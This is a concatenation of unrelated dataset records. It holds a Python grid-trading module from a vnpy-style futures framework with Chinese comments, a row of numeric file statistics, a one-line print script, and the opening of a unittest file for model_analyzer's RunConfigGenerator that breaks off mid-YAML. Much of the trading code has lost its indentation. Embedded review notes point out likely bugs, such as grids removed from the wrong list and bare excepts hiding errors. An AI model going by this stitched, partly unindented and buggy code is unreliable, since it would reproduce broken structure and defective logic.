self.writeCtaLog(u'DEBUG- rebuildGrids Long, lots:{},upline:{},dnline:{} [{}~{}]'.format(lots, upline, dnline, upline, upline + gridSteps[-1] * upRate))
else:
# 移除未挂单的上网格
for x in self.upGrids[:]:
if not x.orderStatus and not x.openStatus and not x.closeStatus:
if len(remove_grids) < 6:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
self.upGrids.remove(x)
else:
if len(opened_grids) < 6:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
if x.openPrice > max_short_price:
max_short_price = x.openPrice
if len(remove_grids) > 0:
self.writeCtaLog(u'清除上网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
self.writeCtaLog(u'保留上网格[{}]'.format(opened_grids))
# 需要重建的剩余网格数量
remainLots = len(self.upGrids)
lots = self.maxLots - remainLots
remainLots = 0 # WJ: correction for the rebuild price
upline = max(upline, max_short_price+self.gridHeight*upRate)
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, upline))
if lots > 0:
# 做多,开仓价为上阻力线+网格高度*i,平仓价为开仓价-止盈高度,开仓数量为缺省
for i in range(0, lots, 1):
open_price = int((upline + gridSteps[i+remainLots] * upRate) / self.minDiff) * self.minDiff
close_price = int((open_price - self.gridWin * upRate) / self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_LONG,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
self.upGrids.append(grid)
self.writeCtaLog(u'重新拉上网格:[{0}~{1}]'.format(upline, upline + gridSteps[-1] * upRate))
self.writeCtaLog(u'DEBUG- rebuildGrids Long, lots:{},upline:{},dnline:{} [{}~{}]'.format(lots, upline, dnline, upline, upline + gridSteps[-1] * upRate))
return result
def recount_avg_open_price(self):
"""计算网格的平均开仓价"""
up_open_list = [x for x in self.upGrids if x.openStatus]
self.max_up_open_price = 0 - sys.maxsize
self.avg_up_open_price = 0 - sys.maxsize
self.min_dn_open_price = sys.maxsize
self.avg_dn_open_price = sys.maxsize
total_price = EMPTY_FLOAT
total_volume = EMPTY_INT
for x in up_open_list:
self.max_up_open_price = max(self.max_up_open_price, x.openPrice)
total_price += x.openPrice*x.volume
total_volume += x.volume
if total_volume > 0:
self.avg_up_open_price = total_price/total_volume
total_price = EMPTY_FLOAT
total_volume = EMPTY_INT
dn_open_list = [x for x in self.dnGrids if x.openStatus]
for x in dn_open_list:
self.min_dn_open_price = min(self.min_dn_open_price,x.openPrice)
total_price += x.openPrice*x.volume
total_volume += x.volume
if total_volume > 0:
self.avg_dn_open_price = total_price/total_volume
def count_avg_open_price(self, grid_list):
"""计算平均开仓价"""
total_price = EMPTY_FLOAT
total_volume = EMPTY_INT
avg_price = EMPTY_FLOAT
for g in grid_list:
total_price += g.openPrice * g.volume
total_volume += g.volume
if total_volume > EMPTY_INT:
avg_price = total_price / total_volume
return avg_price
    def combineOpenedGrids(self,direction,type=EMPTY_STRING):
        """Merge all opened (not ordered) grids of *type* on one side into one grid.

        The surviving grid receives the volume-weighted average open/close
        price (snapped to minDiff) and the combined volume.

        NOTE(review): the SHORT branch fetches grids via
        getGrids(DIRECTION_SHORT) — which searches self.dnGrids — yet removes
        the merged-away grids from self.upGrids (the LONG branch mirrors
        this). If getGrids' mapping is correct, remove() would raise
        ValueError here; confirm which list each direction is meant to use.
        """
        total_open_price = EMPTY_FLOAT
        total_close_price = EMPTY_FLOAT
        total_volume = EMPTY_INT
        saved_grid = None
        if direction == DIRECTION_SHORT:
            opened_short_grids = self.getGrids(direction=direction, opened=True, ordered=False, type = type)
            # nothing to merge with 0 or 1 grid
            if len(opened_short_grids)<=1:
                return
            self.writeCtaLog(u'{}个空网格合并为1个'.format(len(opened_short_grids)))
            # keep the last grid; fold the others into it
            saved_grid = opened_short_grids[-1]
            for g in opened_short_grids:
                total_open_price += g.openPrice * g.volume
                total_close_price += g.closePrice * g.volume
                total_volume += g.volume
                if g != saved_grid:
                    self.writeCtaLog(u'删除空网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
                    self.upGrids.remove(g)
                else:
                    self.writeCtaLog(u'保留空网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
            # rewrite the surviving grid with the volume-weighted prices
            saved_grid.openPrice = int((total_open_price / total_volume)/self.minDiff)*self.minDiff
            saved_grid.volume = total_volume
            saved_grid.closePrice = int((total_close_price / total_volume)/self.minDiff)*self.minDiff
            self.writeCtaLog(u'合并后空网格为{}=>{},v:{}'.format(saved_grid.openPrice, saved_grid.closePrice, saved_grid.volume))
        elif direction == DIRECTION_LONG:
            opened_long_grids = self.getGrids(direction=direction, opened=True, ordered=False, type=type)
            if len(opened_long_grids) <= 1:
                return
            self.writeCtaLog(u'{}个多网格合并为1个'.format(len(opened_long_grids)))
            saved_grid = opened_long_grids[-1]
            for g in opened_long_grids:
                total_open_price += g.openPrice * g.volume
                total_close_price += g.closePrice * g.volume
                total_volume += g.volume
                if g != saved_grid:
                    self.writeCtaLog(u'删除多网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
                    self.dnGrids.remove(g)
                else:
                    self.writeCtaLog(u'保留多网格 {}=>{},v:{}'.format(g.openPrice, g.closePrice, g.volume))
            # rewrite the surviving grid with the volume-weighted prices
            saved_grid.openPrice = int((total_open_price / total_volume) / self.minDiff) * self.minDiff
            saved_grid.volume = total_volume
            saved_grid.closePrice = int((total_close_price / total_volume) / self.minDiff) * self.minDiff
            self.writeCtaLog(
                u'合并后多网格为{}=>{},v:{}'.format(saved_grid.openPrice, saved_grid.closePrice, saved_grid.volume))
    def clearDuplicateGrids(self,direction=EMPTY_STRING,type=EMPTY_STRING):
        """Drop not-yet-ordered, not-yet-opened grids sharing a duplicate open price.

        The first grid seen at each open price is kept; later duplicates are
        removed. An empty *direction* is meant to process both sides.

        NOTE(review): the SHORT branch collects candidates via
        getGrids(DIRECTION_SHORT) (which searches self.dnGrids) but removes
        them from self.upGrids, with a bare ``except`` silently hiding the
        resulting ValueError; the LONG branch mirrors this. Also, the early
        ``return``s in the SHORT branch skip the LONG branch entirely when
        direction == EMPTY_STRING. Confirm both behaviours.
        """
        if direction == DIRECTION_SHORT or direction==EMPTY_STRING:
            if len(self.upGrids) < 2:
                return
            checking_grids = self.getGrids(direction=DIRECTION_SHORT, opened=False,ordered=False,type=type)
            if len(checking_grids) < 2:
                return
            open_price_list = []
            remove_grids = []
            # first occurrence of each open price wins
            for g in checking_grids:
                if g.openPrice in open_price_list:
                    remove_grids.append(g)
                    continue
                open_price_list.append(g.openPrice)
            for rg in remove_grids:
                try:
                    self.upGrids.remove(rg)
                except:
                    # NOTE(review): bare except hides real errors (see above)
                    pass
        if direction == DIRECTION_LONG or direction==EMPTY_STRING:
            if len(self.dnGrids) < 2:
                return
            checking_grids = self.getGrids(direction=DIRECTION_LONG, opened=False, ordered=False, type=type)
            if len(checking_grids) < 2:
                return
            open_price_list = []
            remove_grids = []
            # first occurrence of each open price wins
            for g in checking_grids:
                if g.openPrice in open_price_list:
                    remove_grids.append(g)
                    continue
                open_price_list.append(g.openPrice)
            for rg in remove_grids:
                try:
                    self.dnGrids.remove(rg)
                except:
                    pass
def save(self, direction=None):
"""
保存网格至本地Json文件"
2017/11/23 update: 保存时,空的列表也保存
:param direction:
:return:
"""""
# 回测模式不保存
if self.strategy and getattr(self.strategy, 'backtesting', False):
return
# 更新开仓均价
self.recount_avg_open_price()
grids_save_path = self.get_data_folder()
# 确保json名字与策略一致
if self.jsonName != self.strategy.name:
self.writeCtaLog(u'JsonName {} 与 上层策略名{} 不一致.'.format(self.jsonName, self.strategy.name))
self.jsonName = self.strategy.name
# 移除旧版上/下网格列表
old_up_json_file = os.path.join(grids_save_path, u'{0}_upGrids.json'.format(self.jsonName))
old_dn_json_file = os.path.join(grids_save_path, u'{0}_dnGrids.json'.format(self.jsonName))
if os.path.exists(old_up_json_file):
try:
os.remove(old_up_json_file)
except:
pass
if os.path.exists(old_dn_json_file):
try:
os.remove(old_dn_json_file)
except:
pass
# 新版网格持久化文件
grid_json_file = os.path.join(grids_save_path, u'{}_Grids.json'.format(self.jsonName))
self.json_file_path = grid_json_file
data = {}
up_grids = []
for grid in self.upGrids:
up_grids.append(grid.toJson())
dn_grids = []
for grid in self.dnGrids:
dn_grids.append(grid.toJson())
data[u'up_grids'] = up_grids
data[u'dn_grids'] = dn_grids
with open(grid_json_file, 'w') as f:
json_data = json.dumps(data, indent=4)
f.write(json_data)
self.writeCtaLog(u'GrideTrade保存文件{}完成'.format(grid_json_file))
    def load(self, direction, openStatusFilter=[]):
        """
        Load grids for one side from the local JSON file(s).

        :param direction: DIRECTION_SHORT -> 'up_grids' section;
                          DIRECTION_LONG  -> 'dn_grids' section
        :param openStatusFilter: [] = no filtering; [True] = only grids with
                                 an open position; [False] = only grids without
        :return: list of CtaGrid objects rebuilt from the file
        """
        # NOTE(review): openStatusFilter=[] is a shared mutable default;
        # harmless here (it is never mutated) but worth replacing with None.
        data = {}
        grids_save_path = self.get_data_folder()
        # Keep the json name in sync with the strategy instance name.
        if self.jsonName != self.strategy.name:
            self.writeCtaLog(u'JsonName {} 与 上层策略名{} 不一致.'.format(self.jsonName, self.strategy.name))
            self.jsonName = self.strategy.name
        # Legacy per-side files: read them if present, then delete them.
        old_up_json_file = os.path.join(grids_save_path, u'{0}_upGrids.json'.format(self.jsonName))
        old_dn_json_file = os.path.join(grids_save_path, u'{0}_dnGrids.json'.format(self.jsonName))
        if os.path.exists(old_up_json_file):
            try:
                with open(old_up_json_file, 'r', encoding='utf8') as f:
                    # parse the legacy up-grid json file
                    data['up_grids'] = json.load(f)
            except IOError:
                self.writeCtaLog(u'读取网格{}出错'.format(old_up_json_file))
                data['up_grids'] = []
            try: # remove the legacy up-grid file
                os.remove(old_up_json_file)
            except:
                pass
        if os.path.exists(old_dn_json_file):
            try:
                with open(old_dn_json_file, 'r', encoding='utf8') as f:
                    # parse the legacy down-grid json file
                    data['dn_grids'] = json.load(f)
            except IOError as ex:
                self.writeCtaLog(u'读取网格{}出错,ex:{}'.format(old_dn_json_file,str(ex)))
                data['dn_grids'] = []
            try: # remove the legacy down-grid file
                os.remove(old_dn_json_file)
            except:
                pass
        # If the combined file does not exist, create it from the legacy data
        # (or from empty lists); otherwise the combined file takes priority.
        grid_json_file = os.path.join(grids_save_path, u'{}_Grids.json'.format(self.jsonName))
        if not os.path.exists(grid_json_file):
            if len(data) == 0:
                data['up_grids'] = []
                data['dn_grids'] = []
                self.writeCtaLog(u'{}不存在,保存'.format(grid_json_file))
            else:
                self.writeCtaLog(u'{}不存在,保存'.format(grid_json_file))
            try:
                with open(grid_json_file, 'w') as f:
                    json_data = json.dumps(data, indent=4)
                    f.write(json_data)
            except Exception as ex:
                self.writeCtaLog(u'写入网格文件{}异常:{}'.format(grid_json_file,str(ex)))
        else:
            # Read the combined json file.
            try:
                with open(grid_json_file, 'r', encoding='utf8') as f:
                    data = json.load(f)
            except Exception as ex:
                self.writeCtaLog(u'读取网格文件{}异常:{}'.format(grid_json_file,str(ex)))
        # Pick the section for the requested side.
        # NOTE(review): DIRECTION_SHORT maps to 'up_grids' here while several
        # other methods in this class map SHORT to dnGrids — confirm the
        # intended direction/list pairing.
        json_grids = []
        if direction == DIRECTION_SHORT :
            json_grids = data['up_grids'] if 'up_grids' in data else []
        elif direction == DIRECTION_LONG:
            json_grids = data['dn_grids'] if 'dn_grids' in data else []
        grids = []
        ids = []
        for i in json_grids:
            closePrice = float(i['closePrice'])
            openPrice = float(i['openPrice'])
            stopPrice = float(i['stopPrice'])
            id = i.get('id')
            self.writeCtaLog(u'load Grid:open:{0},close:{1},stop:{2}'.format(openPrice, closePrice, stopPrice))
            grid = CtaGrid(direction=i['direction'], openprice=openPrice, closeprice=closePrice,
                           stopprice=stopPrice, volume=i['volume'])
            # Keep the persisted id only the first time it is seen; a
            # duplicate id falls back to the freshly generated one.
            if id is not None and id not in ids:
                grid.id = id
                ids.append(id)
            grid.orderStatus = i['orderStatus'] # order pending at the broker: True/False
            grid.orderRef = i['orderRef'] # order reference id
            grid.openStatus = i['openStatus'] # position opened
            grid.closeStatus = i['closeStatus'] # position closed
            strTime = i['openDatetime']
            if strTime == EMPTY_STRING or type(strTime)==type(None):
                grid.openDatetime = None
            else:
                grid.openDatetime = datetime.strptime(strTime, '%Y-%m-%d %H:%M:%S')
            # Optional fields below: tolerate files written by older versions.
            try:
                grid.tradedVolume = i['tradedVolume'] # contracts already traded
            except KeyError:
                grid.tradedVolume = EMPTY_INT
            try:
                grid.lockGrids = i['lockGrids']
            except KeyError:
                grid.lockGrids = []
            try:
                grid.type = i['type']
                # old files may have persisted the type as JSON false
                if grid.type == False:
                    grid.type = EMPTY_STRING
            except KeyError:
                grid.type = EMPTY_STRING
            try:
                grid.reuse = i['reuse']
            except KeyError:
                grid.reuse = False
            try:
                grid.openPrices = i['openPrices']
            except KeyError:
                grid.openPrices = {}
            try:
                grid.snapshot = i['snapshot']
            except KeyError:
                grid.snapshot = {}
            self.writeCtaLog(grid.toStr())
            # Filter on open status so some strategies can load only the
            # already-opened (or only the pending) grids.
            if len(openStatusFilter) > 0:
                if grid.openStatus not in openStatusFilter:
                    continue
            grids.append(grid)
        # Refresh the average open prices.
        self.recount_avg_open_price()
        return grids
def get_data_folder(self):
"""获取数据目录"""
# 工作目录
currentFolder = os.path.abspath(os.path.join(os.getcwd(), u'data'))
if os.path.isdir(currentFolder):
# 如果工作目录下,存在data子目录,就使用data子目录
return currentFolder
else:
# 否则,使用缺省保存目录 vnpy/trader/app/ctaStrategy/data
return os.path.abspath(os.path.join(os.path.dirname(__file__), u'data'))
def changeStrategyName(self, old_name, new_name):
"""
在线更换策略实例名称,需要把Json文件也转移
:param old_name:
:param new_name:
:return:
"""
if old_name == new_name:
self.writeCtaLog(u'更换策略实例名称失败,old:{} =>new:{}'.format(old_name, new_name))
return
data_folder = self.get_data_folder()
self.jsonName = new_name
# 旧文件
old_up_json_file = os.path.join(data_folder, u'{0}_upGrids.json'.format(old_name))
old_dn_json_file = os.path.join(data_folder, u'{0}_dnGrids.json'.format(old_name))
old_json_file = os.path.join(data_folder, u'{0}_Grids.json'.format(old_name))
# 新文件
self.json_file_path = os.path.join(data_folder, u'{0}_Grids.json'.format(new_name))
if os.path.isfile(self.json_file_path): # 新文件若存在,移除
try:
os.remove(self.json_file_path)
except Exception as ex:
self.writeCtaLog(u'GridTrade.changeStrategyName 删除文件:{}异常:{}'.format(old_up_json_file,str(ex)))
# 移动文件
if os.path.isfile(old_json_file):
try:
shutil.move(old_json_file, self.json_file_path)
return
except Exception as ex:
self.writeCtaLog(u'GridTrade.changeStrategyName 移动文件:{}=》{}异常:{}'.format(old_up_json_file, self.json_file_path, str(ex)))
else:
data = {}
if os.path.isfile(old_up_json_file):
try:
with open(old_up_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['up_grids'] = json.load(f)
except IOError:
self.writeCtaLog(u'读取网格{}出错'.format(old_up_json_file))
data['up_grids'] = []
try: # 移除旧版上网格文件
os.remove(old_up_json_file)
except IOError:
self.writeCtaLog(u'移除网格{}出错'.format(old_up_json_file))
else:
data['up_grids'] = []
if os.path.isfile(old_dn_json_file):
try:
with open(old_dn_json_file, 'r', encoding='utf8') as f:
# 解析json文件
data['dn_grids'] = json.load(f)
except IOError:
self.writeCtaLog(u'读取网格{}出错'.format(old_dn_json_file))
data['dn_grids'] = []
try: # 移除旧版上网格文件
os.remove(old_dn_json_file)
except IOError:
self.writeCtaLog(u'移除网格{}出错'.format(old_dn_json_file))
else:
data['dn_grids'] = []
try:
with open(self.json_file_path, 'w') as f:
json_data = json.dumps(data, indent=4)
f.write(json_data)
except IOError as ex:
self.writeCtaLog(u'写入网格文件{}异常:{}'.format(self.json_file_path, str(ex)))
def getJsonFilePath(self):
"""
返回上下网格的文件路径
:return:
"""
return self.json_file_path
def getTypesOfOpenedGrids(self, direction, include_empty=False):
"""
获取开仓的网格类型列表
:param direction:
:param include_empty: 是否包含空值的类型
:return:
"""
grids = self.getOpenedGrids(direction)
type_list = []
for g in grids:
if g.type not in type_list and (g.type !=EMPTY_STRING if not include_empty else True):
type_list.append(g.type)
return type_list
ARBITRAGE_LONG = u'正套'
ARBITRAGE_SHORT = u'反套'
class ArbitrageGrid(object):
"""套利网格"""
def __init__(self,direction, openprice, closeprice, stopprice=EMPTY_FLOAT, type=EMPTY_STRING):
self.leg1 = None
self.leg2 = None
self.id = str(uuid.uuid1())
self.direction = direction # 正套(ARBITRAGE_LONG) 反套(ARBITRAGE_SHORT)
self.openPrice = openprice # 开仓价格/价比
self.closePrice = closeprice # 平仓价格/价比
self.stopPrice = stopprice # 止损价格/价比
self.type = type # 套利类型(自定义)
self.snapshot = {}
def update_leg1(self,grid):
"""
添加腿1
:param grid:
:return:
"""
if isinstance(grid, CtaGrid):
self.leg1 = grid
else:
print(u'leg1 不是CtaGrid类型')
def update_leg2(self, grid):
"""
添加腿2
:param grid:
:return:
"""
if isinstance(grid, CtaGrid):
self.leg2 = grid
else:
print(u'leg2 不是CtaGrid类型')
def toJson(self):
j = OrderedDict()
j['id'] = self.id
j['direction'] = self.direction
j['openPrices'] = self.openPrice
j['closePrice'] = self.closePrice
j['stopPrice'] = self.stopPrice
j['type'] = self.type
j['snapshot'] = self.snapshot # 切片数据
try:
if self.leg1 is not None:
j['leg1'] = self.leg1.toJson()
if self.leg2 is not None:
j['leg2'] = self.leg2.toJson()
except Exception as ex:
print(u'Arbitrage Grid toJson exception:{} {}'.format(str(ex), traceback.format_exc()),file=sys.stderr)
return j
def fromJson(self,j):
if 'id' in j:
self.id = j.get('id')
self.direction = j.get('direction',EMPTY_STRING)
self.openPrice = j.get('openPrice',EMPTY_FLOAT)
self.closePrice = j.get('closePrice',EMPTY_FLOAT)
self.stopPrice = j.get('stopPrice',EMPTY_FLOAT)
self.type = j.get('type',EMPTY_STRING)
self.snapshot = j.get('snapshot',{})
if 'leg1' in j:
if self.leg1 is None:
self.leg1 = CtaGrid(direction=EMPTY_STRING,openprice=EMPTY_FLOAT,closeprice=EMPTY_FLOAT)
self.leg1.fromJson(j.get('leg1'))
if 'leg2' in j:
if self.leg2 is None:
self.leg2 = CtaGrid(direction=EMPTY_STRING,openprice=EMPTY_FLOAT,closeprice=EMPTY_FLOAT)
self.leg2.fromJson(j.get('leg2'))
class ArbitrageTrade(object):
"""
套利交易网格,仅用于持久化记录价差/价比/跨市场/期现套利等
它包含正套网格/反套网格两个队列
"""
def __init__(self, strategy, leg1_settings, leg2_settings):
"""
构造函数
:param strategy: 上层调用策略
"""
self.strategy = strategy
# 交易合约
self.leg1_symbol = leg1_settings.get('vtSymbol', EMPTY_STRING)
self.leg2_symbol = leg2_settings.get('vtSymbol', EMPTY_STRING)
# 交易合约的杠杆比率
self.leg1_size = leg1_settings.get('size', 1)
self.leg2_size = leg2_settings.get('size', 1)
# 正套队列
self.long_list = []
# 反套队列
self.short_list = []
def writeCtaLog(self, log):
"""
写入日志
:param log:
:return:
"""
if self.strategy and hasattr(self.strategy,'writeCtaLog'):
self.strategy.writeCtaLog(log)
else:
print(log)
def writeCtaError(self, log):
"""
写入错误日志
:param log:
:return:
"""
if self.strategy and hasattr(self.strategy, 'writeCtaError'):
self.strategy.writeCtaError(log)
else:
print(log,file=sys.stderr)
def toJson(self):
"""
=> json object
:return:
"""
j = OrderedDict()
j['leg1_symbol'] = self.leg1_symbol
j['leg1_size'] = self.leg1_size
j['long_list'] = [g.toJson() for g in self.long_list]
j['leg2_symbol'] = self.leg2_symbol
j['leg2_size'] = self.leg2_size
j['short_list'] = [g.toJson() for g in self.short_list]
return j
def fromJson(self,j):
"""
从Json格式恢复数据
:param j:
:return:
"""
self.writeCtaLog(u'数据将从Json恢复')
self.leg1_symbol = j.get('leg1_symbol',EMPTY_STRING)
self.leg2_symbol = j.get('leg2_symbol',EMPTY_STRING)
self.leg1_size = j.get('leg1_size',1)
self.leg2_size = j.get('leg2_size',1)
self.long_list = []
for long_json in j.get('long_list',[]):
g = ArbitrageGrid(direction=ARBITRAGE_LONG,openprice=long_json.get('openPrice',EMPTY_FLOAT),closeprice=long_json.get('closePrice',EMPTY_FLOAT))
g.fromJson(long_json)
self.long_list.append(g)
self.short_list = []
for short_json in j.get('short_list', []):
g = ArbitrageGrid(direction=ARBITRAGE_SHORT, openprice=short_json.get('openPrice', EMPTY_FLOAT),
closeprice=short_json.get('closePrice', EMPTY_FLOAT))
g.fromJson(short_json)
self.short_list.append(g)
self.writeCtaLog(u'数据恢复完毕')
def get_data_folder(self):
"""获取数据目录"""
# 工作目录
currentFolder = os.path.abspath(os.path.join(os.getcwd(), u'data'))
if os.path.isdir(currentFolder):
# 如果工作目录下,存在data子目录,就使用data子目录
return currentFolder
else:
# 否则,使用缺省保存目录 vnpy/trader/app/ctaStrategy/data
currentFolder = os.path.abspath(os.path.join(os.path.dirname(__file__), u'data'))
if os.path.exists(currentFolder):
if os.path.isdir(currentFolder):
return currentFolder
else:
return os.path.dirname(__file__)
else:
os.mkdir(currentFolder)
return currentFolder
def save(self,db=EMPTY_STRING):
"""
持久化到json文件
:return:
"""
if not self.strategy:
self.writeCtaError(u'策略对象为空,不能保存')
return
# 回测模式不保存
if self.strategy and getattr(self.strategy, 'backtesting', False):
return
json_file = os.path.abspath(
os.path.join(self.get_data_folder(), u'{}_AGrids.json'.format(self.strategy.name)))
try:
json_data = self.toJson()
with open(json_file, 'w') as f:
data = json.dumps(json_data, indent=4)
f.write(data)
except IOError as ex:
self.writeCtaError(u'写入AGrids文件{}出错,ex:{}'.format(json_file, str(ex)))
def load(self,db=EMPTY_STRING):
"""
数据从Json文件加载
:return:
"""
if not self.strategy:
self.writeCtaError(u'策略对象为空,不能加载')
return
json_file = os.path.abspath(os.path.join(self.get_data_folder(), u'{}_AGrids.json'.format(self.strategy.name)))
json_data = {}
if os.path.exists(json_file):
try:
with open(json_file, 'r', encoding='utf8') as f:
# 解析json文件
json_data = json.load(f)
except IOError as ex:
self.writeCtaError(u'读取AGrids文件{}出错,ex:{}'.format(json_file, str(ex)))
json_data = {}
# 从持久化文件恢复数据
self.fromJson(json_data)
def addGrid(self,grid):
"""
添加正套/反套网格
:param grid:
:return:
"""
if not isinstance(grid,ArbitrageGrid):
self.writeCtaError(u'添加网格不是套利网格ArbitrageGrid类型')
return
if grid.direction == ARBITRAGE_LONG:
if grid.id in [g.id for g in self.long_list]:
self.writeCtaError('添加{}网格 id{}已存在,不能添加'.format(ARBITRAGE_LONG, grid.id))
return
self.long_list.append(grid)
return
if grid.direction == ARBITRAGE_SHORT:
if grid.id in [g.id for g in self.short_list]:
self.writeCtaError(u'添加{}网格 id{}已存在,不能添加'.format(ARBITRAGE_SHORT, grid.id))
return
self.short_list.append(grid)
| 40.344523 | 169 | 0.53594 | 12,177 | 114,175 | 4.89513 | 0.054283 | 0.033217 | 0.034895 | 0.011743 | 0.893253 | 0.870571 | 0.859633 | 0.845457 | 0.830241 | 0.814303 | 0 | 0.007283 | 0.357845 | 114,175 | 2,829 | 170 | 40.358784 | 0.805723 | 0.05961 | 0 | 0.869805 | 0 | 0.001002 | 0.055532 | 0.016047 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044066 | false | 0.006009 | 0.004507 | 0.000501 | 0.119179 | 0.003005 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b969dcea70b5cbeafd9250bb5ad0855b93ed0840 | 17 | py | Python | ttry.py | moonbaby1023/HPC_final_project | 01fc52e0a3c3ffa86637a91ce6d51fc65e83839d | [
"MIT"
] | 1 | 2021-06-22T17:03:11.000Z | 2021-06-22T17:03:11.000Z | ttry.py | moonbaby1023/HPC_final_project | 01fc52e0a3c3ffa86637a91ce6d51fc65e83839d | [
"MIT"
] | null | null | null | ttry.py | moonbaby1023/HPC_final_project | 01fc52e0a3c3ffa86637a91ce6d51fc65e83839d | [
"MIT"
] | null | null | null | print(str(12.66)) | 17 | 17 | 0.705882 | 4 | 17 | 3 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.235294 | 0 | 17 | 1 | 17 | 17 | 0.470588 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
b972833d7683323ac1d2e6fffee663b9475628da | 24,112 | py | Python | tests/test_run_config_generator.py | jishminor/model_analyzer | 8593a473bcc923f90a892cffe59fa9980b55c27f | [
"Apache-2.0"
] | null | null | null | tests/test_run_config_generator.py | jishminor/model_analyzer | 8593a473bcc923f90a892cffe59fa9980b55c27f | [
"Apache-2.0"
] | null | null | null | tests/test_run_config_generator.py | jishminor/model_analyzer | 8593a473bcc923f90a892cffe59fa9980b55c27f | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .common import test_result_collector as trc
from .mocks.mock_config import MockConfig
from .mocks.mock_model_config import MockModelConfig
from .mocks.mock_client import MockTritonClientMethods
from model_analyzer.config.input.config import AnalyzerConfig
from model_analyzer.cli.cli import CLI
from model_analyzer.triton.client.grpc_client import TritonGRPCClient
from model_analyzer.config.run.run_search import RunSearch
from model_analyzer.config.run.run_config_generator \
import RunConfigGenerator
from unittest.mock import mock_open, patch
import yaml
class TestRunConfigGenerator(trc.TestResultCollector):
def _evaluate_config(self, args, yaml_content):
mock_config = MockConfig(args, yaml_content)
mock_config.start()
config = AnalyzerConfig()
cli = CLI(config)
cli.parse()
mock_config.stop()
return config
def test_parameter_sweep(self):
args = [
'model-analyzer', '--model-repository', 'cli_repository', '-f',
'path-to-config-file', '--model-names', 'vgg11',
'--run-config-search-disable'
]
yaml_content = ''
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client = MockTritonClientMethods()
mock_client.start()
client = TritonGRPCClient('localhost:8000')
run_search = RunSearch(16, 1, 16)
# When there is not any sweep_parameter the length of
# run_configs should be equal to the length of different
# sweep configurations per model
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 1)
mock_model_config.stop()
mock_client.stop()
yaml_content = yaml.dump({
'concurrency': [2, 3, 4],
'batch_sizes': [4, 5, 6]
})
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 9)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
kind: KIND_GPU
count: 1
-
kind: KIND_CPU
count: 1
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 1)
mock_model_config.stop()
mock_client.stop()
args = [
'model-analyzer', '--model-repository', 'cli_repository', '-f',
'path-to-config-file', '--run-config-search-disable'
]
yaml_content = """
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
-
kind: KIND_GPU
count: 1
-
-
kind: KIND_CPU
count: 1
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_client.start()
mock_model_config.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 2)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
model_names:
-
vgg_16_graphdef:
model_config_parameters:
instance_group:
-
-
kind: KIND_GPU
count: 1
-
kind: KIND_CPU
count: 1
"""
config = self._evaluate_config(args, yaml_content)
mock_model_config = MockModelConfig()
mock_model_config.start()
mock_client.start()
with patch('model_analyzer.triton.model.model_config.open',
mock_open()):
for model in config.model_names:
run_config_generator = RunConfigGenerator(model,
config,
client,
None,
None,
None,
run_search,
generate_only=True)
run_configs = run_config_generator.get_run_configs()
self.assertEqual(len(run_configs), 1)
mock_model_config.stop()
mock_client.stop()
yaml_content = """
model_names:
-
